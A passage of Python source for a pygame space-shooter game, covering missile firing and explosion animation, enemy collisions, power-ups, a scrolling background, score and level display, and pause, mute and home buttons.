charge_rot_img.get_rect(center=charge_rect.center)\r\n window.blit(charge_rot_img, charge_rot_rect)\r\n charge_rot_angle += 1\r\n else: \r\n window.blit(charge_img_list[charge_value-1], charge_rect)\r\n\r\n window.blit(rocket_img1, rocket_rect)\r\n\r\n if hit_value >= 5:\r\n hit_value = 0\r\n if charge_value < 12:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(charge_up_sound)\r\n\r\n if charge_value == 0:\r\n charge_rot_angle = 1\r\n\r\n\r\n#Player missile properties and functions\r\nmissile_img = pg.image.load(r'.\\resources\\images\\bullet\\missile-fill-small.png').convert_alpha()\r\nmissile_rect = missile_img.get_rect(midbottom=player_rect.midtop)\r\nmissile_yspeed = 0.7\r\nmissile_cur_x = missile_rect.x\r\nmissile_cur_y = missile_rect.y\r\nmissile_draw = False\r\nmissile_launch = False\r\nmissile_explosion_dict = {}\r\nmissile_explosion_delay = 200\r\nmissile_explosion_time_elapse = 0\r\nexplosion_i = 0\r\nmissile_explosion = False\r\nexplosion_center = (0, 0)\r\nexplosion_effect = True\r\nmissile_launch_sound = mixer.Sound(r'.\\resources\\sounds\\rocket-deploy.wav')\r\nmissile_explosion_sound = mixer.Sound(r'.\\resources\\sounds\\large-explosion-short.wav')\r\nmissile_explosion_sound.set_volume(0.7)\r\n\r\nfor i in range(1, 18):\r\n explosion = 'explosion' + str(i)\r\n missile_explosion_dict[explosion] = [pg.image.load(fr'.\\resources\\images\\bullet\\missile-explosion\\{explosion}.png').convert_alpha()]\r\n\r\nfor explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion].append(missile_explosion_dict[explosion][0].get_rect())\r\n\r\nexplosion_list = list(missile_explosion_dict.keys())\r\nexplosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n\r\ndef draw_missile(dt):\r\n global missile_img, missile_rect, missile_yspeed, missile_cur_x\r\n global missile_cur_y, missile_draw, missile_explosion_time_elapse\r\n global explosion_i, explosion_cycle, player_rect, missile_explosion\r\n global explosion_center, enemy_small, score_value, enemy_medium\r\n global explosion_effect, enemy_large, window_rect, hit_value, channels\r\n global missile_explosion_sound, missile_launch_sound, enemy_small_killed\r\n\r\n if missile_draw:\r\n window.blit(missile_img, (missile_cur_x, missile_cur_y))\r\n\r\n missile_cur_y -= missile_yspeed * dt\r\n\r\n missile_rect.y = missile_cur_y\r\n\r\n if missile_rect.top <= 150:\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n\r\n #Checking collision of missile with different type of enemies\r\n for enemy in enemy_small:\r\n if (enemy_small[enemy]['rect'].colliderect(missile_rect) and\r\n enemy_small[enemy]['alive'] and\r\n missile_draw):\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n\r\n if (enemy_medium.enemy_rect.colliderect(window_rect) and\r\n enemy_medium.enemy_rect.colliderect(missile_rect) and\r\n enemy_medium.enemy_health > 0 and\r\n explosion_effect and\r\n missile_draw):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health = enemy_medium.enemy_health - 5 if enemy_medium.enemy_health > 5 else 0\r\n #print(enemy_medium.enemy_health)\r\n explosion_effect = False\r\n enemy_medium.lasers.clear()\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n hit_value += 2\r\n #if mute == False:\r\n # explosion_sound.play()\r\n\r\n if (enemy_large.enemy_rect.colliderect(window_rect) and\r\n enemy_large.enemy_rect.colliderect(missile_rect) and\r\n enemy_large.enemy_health > 0 and\r\n explosion_effect and\r\n missile_draw):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health = enemy_large.enemy_health - 5 if enemy_large.enemy_health > 5 else 0\r\n #print(enemy_large.enemy_health)\r\n explosion_effect = False\r\n for plasma in enemy_large.plasmas:\r\n enemy_large.plasmas[plasma]['draw'] = False\r\n enemy_large.lasers.clear()\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n hit_value += 2\r\n #if mute == False:\r\n # explosion_sound.play()\r\n \r\n\r\n \r\n if missile_explosion:\r\n if mute == False and missile_explosion_time_elapse == 0:\r\n channels[4].play(missile_explosion_sound)\r\n #print(explosion_cycle)\r\n for explosion in explosion_cycle:\r\n missile_explosion_dict[explosion][1].center = explosion_center\r\n window.blit(missile_explosion_dict[explosion][0],\r\n missile_explosion_dict[explosion][1])\r\n\r\n missile_explosion_time_elapse += dt\r\n if missile_explosion_time_elapse >= 80:\r\n explosion_i += 1\r\n explosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n missile_explosion_time_elapse = 1\r\n\r\n if explosion_i == len(missile_explosion_dict)-1:\r\n missile_explosion_time_elapse = 0\r\n explosion_i = 0\r\n missile_explosion = False\r\n explosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n explosion_effect = True\r\n for explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion][1].center = (-1000, -1000)\r\n\r\n #Checking collision of explosion with different type of enemies \r\n for enemy in enemy_small:\r\n if (enemy_small[enemy]['rect'].colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_small[enemy]['alive']):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n enemy_small_killed += 1\r\n\r\n if (enemy_small[enemy]['laser_rect'].colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_small[enemy]['laser_draw']):\r\n enemy_small[enemy]['laser_draw'] = False\r\n #if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n #explosion_sound.play()\r\n\r\n if (enemy_medium.enemy_rect.colliderect(window_rect) and\r\n enemy_medium.enemy_rect.colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_medium.enemy_health > 0 and\r\n explosion_effect):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health = enemy_medium.enemy_health - 5 if enemy_medium.enemy_health > 5 else 0\r\n #print(enemy_medium.enemy_health)\r\n explosion_effect = False\r\n enemy_medium.lasers.clear()\r\n #if mute == False:\r\n # explosion_sound.play()\r\n\r\n if (enemy_large.enemy_rect.colliderect(window_rect) and\r\n enemy_large.enemy_rect.colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_large.enemy_health > 0 and\r\n explosion_effect):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health = enemy_large.enemy_health - 5 if enemy_large.enemy_health > 5 else 0\r\n #print(enemy_large.enemy_health)\r\n explosion_effect = False\r\n for plasma in enemy_large.plasmas:\r\n enemy_large.plasmas[plasma]['draw'] = False\r\n enemy_large.lasers.clear()\r\n #if mute == False:\r\n # explosion_sound.play()\r\n \r\n\r\n#Player power-ups properties and functions\r\nclass PowerUps():\r\n\r\n def __init__(self):\r\n self.powerups = {\r\n 'life' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\life-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\life-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\pickup-01.wav'),\r\n 'draw' : False,\r\n 'func' : self.life_powerup},\r\n 'freeze' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\freeze-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\freeze-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\freeze-loud.wav'),\r\n 'sound2' : mixer.Sound(r'.\\resources\\sounds\\depressurized.wav'),\r\n 'draw' : False,\r\n 'func' : self.freeze_powerup},\r\n 'charge' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\charge-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\charge-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\charge-up.wav'),\r\n 'draw' : False,\r\n 'func' : self.charge_powerup},\r\n }\r\n\r\n self.yspeed = 0.2\r\n self.pchoice = None\r\n self.time_elapse = 0\r\n self.pcollected = None\r\n \r\n self.original_speed = {\r\n 'enemy_small' : [],\r\n 'enemy_medium' : [],\r\n 'enemy_large' : []\r\n }\r\n self.freeze_time = 0\r\n \r\n\r\n def draw(self, dt):\r\n\r\n if self.pchoice is None:\r\n option_list = list(self.powerups.keys()) + [None] \r\n self.pchoice = random.choices(option_list, [1, 1, 2, 2996])[0]\r\n if self.pchoice is not None:\r\n self.powerups[self.pchoice]['rect'].center = (random.randint(50, window_width-50), -100)\r\n self.powerups[self.pchoice]['draw'] = True\r\n self.time_elapse = 0\r\n\r\n if self.pchoice is not None:\r\n \r\n if self.powerups[self.pchoice]['draw']:\r\n if self.time_elapse <= 700:\r\n window.blit(self.powerups[self.pchoice]['img'], self.powerups[self.pchoice]['rect'])\r\n elif self.time_elapse <= 1400:\r\n window.blit(self.powerups[self.pchoice]['img_invert'], self.powerups[self.pchoice]['rect'])\r\n\r\n if self.time_elapse > 1400:\r\n self.time_elapse = 0\r\n\r\n self.time_elapse += dt\r\n \r\n self.powerups[self.pchoice]['rect'].y += self.yspeed * dt\r\n\r\n if self.powerups[self.pchoice]['rect'].y > window_height+5:\r\n self.powerups[self.pchoice]['rect'].center = (0,0)\r\n self.powerups[self.pchoice]['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def life_powerup(self, dt):\r\n global player_health, mute, player_max_health, channels\r\n\r\n self.pcollected = 'life'\r\n\r\n if player_health < player_max_health and self.powerups['life']['draw']:\r\n player_health += 1\r\n if mute == False:\r\n channels[5].play(self.powerups['life']['sound'])\r\n\r\n self.powerups['life']['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def charge_powerup(self, dt):\r\n global charge_value, mute, channels\r\n\r\n self.pcollected = 'charge'\r\n\r\n if charge_value < 12 and self.powerups['charge']['draw']:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(self.powerups['charge']['sound'])\r\n\r\n self.powerups['charge']['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def freeze_powerup(self, dt):\r\n global enemy_small, mute, player_rect, enemy_medium, enemy_large, channels\r\n\r\n self.pcollected = 'freeze'\r\n\r\n if self.powerups['freeze']['draw']: \r\n #if mute == False:\r\n # self.powerups['charge']['sound'].play()\r\n self.powerups['freeze']['draw'] = False\r\n #self.pchoice = None\r\n\r\n self.powerups['freeze']['rect'].center = player_rect.center \r\n\r\n if self.freeze_time == 0:\r\n if mute == False:\r\n channels[6].play(self.powerups['freeze']['sound'])\r\n for enemy in enemy_small:\r\n self.original_speed['enemy_small'].append([enemy_small[enemy]['enemy_smallX_change'],\r\n enemy_small[enemy]['enemy_smallY_change']])\r\n enemy_small[enemy]['enemy_smallX_change'] = 0\r\n enemy_small[enemy]['enemy_smallY_change'] = 0\r\n\r\n self.original_speed['enemy_medium'].append([enemy_medium.enemy_xspeed,\r\n enemy_medium.enemy_yspeed])\r\n enemy_medium.enemy_xspeed = 0\r\n enemy_medium.enemy_yspeed = 0\r\n enemy_medium.lasers.clear()\r\n\r\n self.original_speed['enemy_large'].append([enemy_large.enemy_xspeed,\r\n enemy_large.enemy_yspeed])\r\n enemy_large.plasma_sound.fadeout(20)\r\n enemy_large.enemy_xspeed = 0\r\n enemy_large.enemy_yspeed = 0\r\n enemy_large.lasers.clear()\r\n enemy_large.set_plasma()\r\n \r\n\r\n self.freeze_time += dt\r\n if 2700 >= self.freeze_time >= 2650:\r\n if mute == False:\r\n channels[7].play(self.powerups['freeze']['sound2'])\r\n if self.freeze_time >= 3000:\r\n for enemy, orig_speed in zip(enemy_small, self.original_speed['enemy_small']):\r\n enemy_small[enemy]['enemy_smallX_change'] = orig_speed[0]\r\n enemy_small[enemy]['enemy_smallY_change'] = orig_speed[1]\r\n\r\n enemy_medium.enemy_xspeed = self.original_speed['enemy_medium'][0][0]\r\n enemy_medium.enemy_yspeed = self.original_speed['enemy_medium'][0][1]\r\n \r\n enemy_large.enemy_xspeed = self.original_speed['enemy_large'][0][0]\r\n enemy_large.enemy_yspeed = self.original_speed['enemy_large'][0][1]\r\n \r\n self.original_speed['enemy_small'].clear()\r\n self.original_speed['enemy_medium'].clear()\r\n self.original_speed['enemy_large'].clear()\r\n\r\n self.powerups['freeze']['rect'].center = (0,0)\r\n self.freeze_time = 0\r\n self.pchoice = None\r\n self.pcollected = None\r\n \r\n\r\npowerups = PowerUps()\r\n\r\n#Moving background properties and functions\r\nclass Background():\r\n def __init__(self):\r\n self.b_r1c1 = pg.image.load(r'.\\resources\\images\\background\\background_horizontal1.png').convert_alpha()\r\n self.b_r1c2 = pg.image.load(r'.\\resources\\images\\background\\background_horizontal2.png').convert_alpha()\r\n self.b_r2c1 = pg.image.load(r'.\\resources\\images\\background\\background_vertical1.png').convert_alpha()\r\n self.b_r2c2 = pg.image.load(r'.\\resources\\images\\background\\background_vertical2.png').convert_alpha()\r\n self.translucent = pg.image.load(r'.\\resources\\images\\background\\background(40%alpha).png').convert_alpha()\r\n\r\n self.xspeed = 0\r\n self.yspeed = 0.15\r\n\r\n self.b_r1c1_rect = self.b_r1c1.get_rect(center=(window_width/2, window_height/2))\r\n self.b_r1c2_rect = self.b_r1c2.get_rect(midleft=self.b_r1c1_rect.midright)\r\n self.b_r2c1_rect = self.b_r2c1.get_rect(midtop=self.b_r1c1_rect.midbottom)\r\n self.b_r2c2_rect = self.b_r2c2.get_rect(midleft=self.b_r2c1_rect.midright)\r\n\r\n self.row_rects = [[self.b_r1c1_rect, self.b_r1c2_rect],\r\n [self.b_r2c1_rect, self.b_r2c2_rect]]\r\n self.col_rects = [list(col) for col in zip(*self.row_rects)]\r\n \r\n def draw_background(self, dt):\r\n global playerX_change, playerY_change, window_rect\r\n \r\n if playerX_change == 0:\r\n self.xspeed = 0\r\n elif playerX_change > 0:\r\n self.xspeed = -0.2\r\n elif playerX_change < 0:\r\n self.xspeed = 0.2\r\n if playerY_change == 0:\r\n self.yspeed = 0.15\r\n elif playerY_change > 0:\r\n self.yspeed = 0.1\r\n elif playerY_change < 0:\r\n self.yspeed = 0.25\r\n\r\n \r\n self.b_r1c1_rect.centerx += self.xspeed*dt\r\n self.b_r1c1_rect.centery += self.yspeed*dt\r\n self.b_r1c2_rect.centerx += self.xspeed*dt\r\n self.b_r1c2_rect.centery += self.yspeed*dt\r\n self.b_r2c1_rect.centerx += self.xspeed*dt\r\n self.b_r2c1_rect.centery += self.yspeed*dt\r\n self.b_r2c2_rect.centerx += self.xspeed*dt\r\n self.b_r2c2_rect.centery += self.yspeed*dt\r\n\r\n #win_rect = window.get_rect(topleft=(0,0))\r\n\r\n if self.b_r1c1_rect.colliderect(window_rect):\r\n window.blit(self.b_r1c1, self.b_r1c1_rect)\r\n #print('1', end='')\r\n if self.b_r1c2_rect.colliderect(window_rect):\r\n window.blit(self.b_r1c2, self.b_r1c2_rect)\r\n #print('2', end='')\r\n if self.b_r2c1_rect.colliderect(window_rect):\r\n window.blit(self.b_r2c1, self.b_r2c1_rect)\r\n #print('3', end='')\r\n if self.b_r2c2_rect.colliderect(window_rect):\r\n window.blit(self.b_r2c2, self.b_r2c2_rect)\r\n #print('4', end='')\r\n \r\n '''\r\n window.blit(self.b_r1c1, self.b_r1c1_rect)\r\n window.blit(self.b_r1c2, self.b_r1c2_rect)\r\n window.blit(self.b_r2c1, self.b_r2c1_rect)\r\n window.blit(self.b_r2c2, self.b_r2c2_rect)\r\n '''\r\n window.blit(self.translucent, (0,0))\r\n\r\n \r\n for row in self.row_rects:\r\n for i, rect in enumerate(row):\r\n if rect.left >= -20:\r\n if i == 0:\r\n row[1].midright = rect.midleft\r\n elif i == 1:\r\n row[0].midright = rect.midleft\r\n\r\n if rect.right <= window_width+20:\r\n if i == 0:\r\n row[1].midleft = rect.midright\r\n elif i == 1:\r\n row[0].midleft = rect.midright\r\n\r\n for col in self.col_rects:\r\n for i, rect in enumerate(col):\r\n if rect.top >= -20:\r\n if i == 0:\r\n col[1].midbottom = rect.midtop\r\n elif i == 1:\r\n col[0].midbottom = rect.midtop\r\n \r\nbackground = Background() \r\n\r\n\r\n#Backgound Objects properties and functions \r\nclass BackgroundObjects():\r\n \r\n def __init__(self):\r\n \r\n self.objects = {}\r\n\r\n i = 1 \r\n for obj in os.listdir(r'.\\resources\\images\\background-objects'):\r\n if obj.endswith(r'.png'):\r\n path = '.\\\\resources\\\\images\\\\background-objects\\\\' + obj \r\n self.objects['object'+str(i)] = {}\r\n self.objects['object'+str(i)]['img'] = pg.image.load(path).convert_alpha()\r\n i += 1\r\n\r\n self.xspeed = 0\r\n self.yspeed = [0.1, 0.2, 0.3] #[0.06, 0.12, 0.18]\r\n\r\n self.obj_draw = []\r\n \r\n self.set_param()\r\n \r\n def set_param(self):\r\n\r\n for obj in self.objects:\r\n self.objects[obj]['rect'] = self.objects[obj]['img'].get_rect()\r\n self.objects[obj]['xchange'] = self.xspeed\r\n \r\n if self.objects[obj]['img'].get_width() == 32:\r\n self.objects[obj]['ychange'] = self.yspeed[0]\r\n elif self.objects[obj]['img'].get_width() == 40:\r\n self.objects[obj]['ychange'] = self.yspeed[1]\r\n elif self.objects[obj]['img'].get_width() == 48:\r\n self.objects[obj]['ychange'] = self.yspeed[2]\r\n \r\n self.objects[obj]['cur_x'] = random.randint(20, window_width-self.objects[obj]['img'].get_width()-20)\r\n self.objects[obj]['cur_y'] = random.randint(-1000, -50)\r\n\r\n def _reset(self, obj):\r\n self.objects[obj]['cur_x'] = random.randint(20, window_width-self.objects[obj]['img'].get_width()-20)\r\n self.objects[obj]['cur_y'] = random.randint(-1000, -50)\r\n\r\n def draw_objects(self, dt):\r\n obj = random.choice(list(self.objects.keys()))\r\n\r\n del_list = []\r\n\r\n if len(self.obj_draw) < 3 and obj not in self.obj_draw:\r\n self._reset(obj)\r\n self.obj_draw.append(obj)\r\n\r\n for obj in self.obj_draw:\r\n self.objects[obj]['cur_x'] += self.objects[obj]['xchange']*dt\r\n self.objects[obj]['cur_y'] += self.objects[obj]['ychange']*dt\r\n\r\n self.objects[obj]['rect'].topleft = (self.objects[obj]['cur_x'],\r\n self.objects[obj]['cur_y'])\r\n\r\n window.blit(self.objects[obj]['img'],\r\n (self.objects[obj]['cur_x'], self.objects[obj]['cur_y']))\r\n\r\n if self.objects[obj]['rect'].top > window_height + 10:\r\n del_list.append(obj)\r\n\r\n for obj in del_list:\r\n self.obj_draw.remove(obj)\r\n\r\nbackground_objects = BackgroundObjects() \r\n\r\n\r\n#Score properties and functions\r\nscore_value = 0\r\nscore_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 30)\r\nscore_background = {\r\n '126' : pg.image.load(r'.\\resources\\images\\text-background\\score-background126.png').convert_alpha(),\r\n '143' : pg.image.load(r'.\\resources\\images\\text-background\\score-background143.png').convert_alpha(),\r\n '160' : pg.image.load(r'.\\resources\\images\\text-background\\score-background160.png').convert_alpha(),\r\n '187' : pg.image.load(r'.\\resources\\images\\text-background\\score-background187.png').convert_alpha()\r\n }\r\nscoreX = 14\r\nscoreY = 10\r\n#print(score_font.size('Score : ' + str(score_value)))\r\ndef draw_score(x, y):\r\n if score_value <= 9:\r\n window.blit(score_background['126'], (x-4, y+1))\r\n elif 9 < score_value <= 99:\r\n window.blit(score_background['143'], (x-4, y+1))\r\n elif score_value > 99:\r\n window.blit(score_background['160'], (x-4, y+1))\r\n elif score_value > 999:\r\n window.blit(score_background['187'], (x-4, y+1))\r\n \r\n score = score_font.render('Score : ' + str(score_value), True, (0,0,0))\r\n window.blit(score, (x,y))\r\n return\r\n\r\n#Level properties and functions\r\nlvl_value = 1\r\nlvl_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 30)\r\nlvl_background = {\r\n '126' : pg.image.load(r'.\\resources\\images\\text-background\\score-background126.png').convert_alpha(),\r\n '143' : pg.image.load(r'.\\resources\\images\\text-background\\score-background143.png').convert_alpha(),\r\n }\r\nlvlX = 14\r\nlvlY = 42+10+10\r\n#print(score_font.size('Score : ' + str(score_value)))\r\ndef draw_lvl():\r\n global lvl_value, lvl_font, lvl_background, lvlX, lvlY\r\n \r\n if lvl_value <= 9:\r\n window.blit(lvl_background['126'], (lvlX-4, lvlY+1))\r\n elif lvl_value > 9:\r\n window.blit(lvl_background['143'], (lvlX-4, lvlY+1))\r\n \r\n lvl = lvl_font.render('Level : ' + str(lvl_value), True, (0,0,0))\r\n window.blit(lvl, (lvlX,lvlY))\r\n return\r\n\r\nlife_increase_sound = mixer.Sound(r'.\\resources\\sounds\\pickup-01.wav')\r\ndef increase_lvl():\r\n global lvl_value, enemy_small_xspeed, enemy_small_yspeed, player_health, player_max_health\r\n global life_increase_sound, charge_value, charge_up_sound, mute, channels\r\n\r\n lvl_value += 1\r\n\r\n if charge_value < 12:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(charge_up_sound)\r\n\r\n if player_health < player_max_health:\r\n player_health += 1\r\n if mute == False:\r\n channels[5].play(life_increase_sound)\r\n\r\n if lvl_value and lvl_value%5 == 0:\r\n enemy_small_xspeed += 0.025 #0.5\r\n enemy_small_yspeed += 0.005 #0.1\r\n\r\n \r\n#Only Image Buttons properties and functions\r\nclass OnlyImgButton():\r\n def __init__(self, img_inactive, img_active, x, y):\r\n self.img_inactive = img_inactive\r\n self.img_active = img_active\r\n self.btn_inactiveX = x\r\n self.btn_inactiveY = y\r\n self.btn_activeX = None\r\n self.btn_activeY = None\r\n self.rect_inactive = None\r\n self.rect_active = None\r\n self.state = 'inactive'\r\n self.set_param()\r\n\r\n def set_param(self):\r\n self.rect_inactive = self.img_inactive.get_rect(x=self.btn_inactiveX, y=self.btn_inactiveY)\r\n self.rect_active = self.img_active.get_rect()\r\n self.rect_active.center = self.rect_inactive.center\r\n self.rect_active.height = self.img_active.get_height()\r\n self.rect_active.width = self.img_active.get_width()\r\n self.btn_activeX = self.rect_active.x\r\n self.btn_activeY = self.rect_active.y\r\n\r\n def update_param(self):\r\n self.btn_inactiveX = window_width-pause_btn_inactive_img.get_width()-15\r\n self.set_param()\r\n\r\n def update_param2(self, x, y):\r\n self.btn_inactiveX = x\r\n self.btn_inactiveY = y\r\n self.set_param()\r\n\r\n def draw_button(self, command=None, event_list=None, screenshot=None):\r\n mouse_pos = pg.mouse.get_pos()\r\n #pg.event.clear()\r\n mouse_click = pg.mouse.get_pressed()\r\n\r\n if self.state == 'inactive':\r\n window.blit(self.img_inactive, (self.btn_inactiveX, self.btn_inactiveY))\r\n \r\n r = self.img_inactive.get_size()[0]/2\r\n\r\n d = math.sqrt((mouse_pos[0]-self.rect_inactive.center[0])**2 + \\\r\n (mouse_pos[1]-self.rect_inactive.center[1])**2)\r\n\r\n if d <= r:\r\n self.state = 'active'\r\n\r\n elif self.state == 'active':\r\n #window.blit(self.img_active, (self.btn_activeX, self.btn_activeY))\r\n \r\n r = self.img_active.get_size()[0]/2\r\n\r\n d = math.sqrt((mouse_pos[0]-self.rect_active.center[0])**2 + \\\r\n (mouse_pos[1]-self.rect_active.center[1])**2)\r\n\r\n if d <= r:\r\n if event_list:\r\n for event in event_list:\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if screenshot:\r\n command(screenshot)\r\n else:\r\n command()\r\n else:\r\n self.state = 'inactive'\r\n\r\n window.blit(self.img_active, (self.btn_activeX, self.btn_activeY))\r\n\r\npause_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\pause40.png').convert_alpha()\r\npause_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\pause56.png').convert_alpha()\r\npause_btn_inactive_x = window_width-pause_btn_inactive_img.get_width()-15\r\npause_btn_inactive_y = 20\r\n\r\npause_btn = OnlyImgButton(pause_btn_inactive_img, pause_btn_active_img,\r\n pause_btn_inactive_x, pause_btn_inactive_y)\r\n\r\nplay_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\play40.png').convert_alpha()\r\nplay_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\play56.png').convert_alpha()\r\nplay_btn_inactive_x = window_width-play_btn_inactive_img.get_width()-15\r\nplay_btn_inactive_y = 20\r\n\r\nplay_btn = OnlyImgButton(play_btn_inactive_img, play_btn_active_img,\r\n play_btn_inactive_x, play_btn_inactive_y)\r\nplay_btn.state = 'active'\r\n\r\npaused = True\r\ndef play_command():\r\n global paused\r\n \r\n paused = False\r\n\r\n mixer.music.set_volume(0.7)\r\n \r\n\r\n\r\npause_txt_background = pg.image.load(r'.\\resources\\images\\text-background\\pause-background1920.png').convert_alpha()\r\ndef pause_command(screenshot):\r\n global paused, window_width, window_height, pause_txt_background\r\n \r\n paused = True\r\n\r\n #screenshot = pg.Surface((window_width, window_height))\r\n #screenshot.blit(window, (0,0))\r\n #pg.image.save(screenshot, r\".\\resources\\images\\screenshots\\screenshot.png\")\r\n \r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Bold.ttf', 100)\r\n textSurface = textFont.render('Paused', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.center = ((window_width/2),(window_height/2))\r\n\r\n textBackgroundRect = pause_txt_background.get_rect()\r\n textBackgroundRect.center = textRect.center\r\n\r\n mixer.music.set_volume(0.3)\r\n\r\n #window_background = pg.image.load(r\".\\resources\\images\\screenshots\\screenshot.png\") \r\n\r\n while paused:\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_btn.update_param()\r\n mute_btn.update_param()\r\n unmute_btn.update_param()\r\n '''\r\n \r\n textRect.center = ((window_width/2),(window_height/2))\r\n textBackgroundRect.center = textRect.center\r\n\r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))#pg.transform.scale(screenshot, (window_width, window_height))\r\n\r\n window.blit(pause_txt_background, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n\r\n play_btn.update_param()\r\n play_btn.draw_button(play_command, event_list)\r\n\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\n\r\nmute_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\mute40.png').convert_alpha()\r\nmute_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\mute56.png').convert_alpha()\r\nmute_btn_inactive_x = window_width - mute_btn_inactive_img.get_width() - 15\r\nmute_btn_inactive_y = 20 + mute_btn_inactive_img.get_height() + 20\r\n\r\nmute_btn = OnlyImgButton(mute_btn_inactive_img, mute_btn_active_img,\r\n mute_btn_inactive_x, mute_btn_inactive_y)\r\n\r\nunmute_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\unmute40.png').convert_alpha()\r\nunmute_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\unmute56.png').convert_alpha()\r\nunmute_btn_inactive_x = window_width - unmute_btn_inactive_img.get_width() - 15\r\nunmute_btn_inactive_y = 20 + unmute_btn_inactive_img.get_height() + 20\r\n\r\nunmute_btn = OnlyImgButton(unmute_btn_inactive_img, unmute_btn_active_img,\r\n unmute_btn_inactive_x, unmute_btn_inactive_y)\r\nunmute_btn.state = 'active'\r\n\r\nmute = False \r\ndef mute_command():\r\n global mute\r\n \r\n mixer.music.pause()\r\n mute = True\r\n\r\ndef unmute_command():\r\n global mute\r\n \r\n mixer.music.play(-1)\r\n mute = False\r\n\r\nhome_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\home40.png').convert_alpha()\r\nhome_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\home56.png').convert_alpha()\r\nhome_btn_inactive_x = window_width - home_btn_inactive_img.get_width() - 15\r\nhome_btn_inactive_y = 20 + 2*home_btn_inactive_img.get_height() + 20 +20\r\n\r\nhome_btn = OnlyImgButton(home_btn_inactive_img, home_btn_active_img,\r\n home_btn_inactive_x, home_btn_inactive_y)\r\n\r\nwait_exit = False\r\ndef home_command(screenshot):\r\n global wait_exit, window_width, window_height\r\n \r\n wait_exit = True\r\n mixer.music.set_volume(0.3)\r\n\r\n #screenshot = pg.Surface((window_width, window_height))\r\n #screenshot.blit(window, (0,0))\r\n #pg.image.save(screenshot, r\".\\resources\\images\\screenshots\\screenshot.png\")\r\n \r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 80)\r\n textSurface = textFont.render('Exit to Main Menu?', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.center = ((window_width/2),(window_height/2)-60)\r\n\r\n home_txt_background = 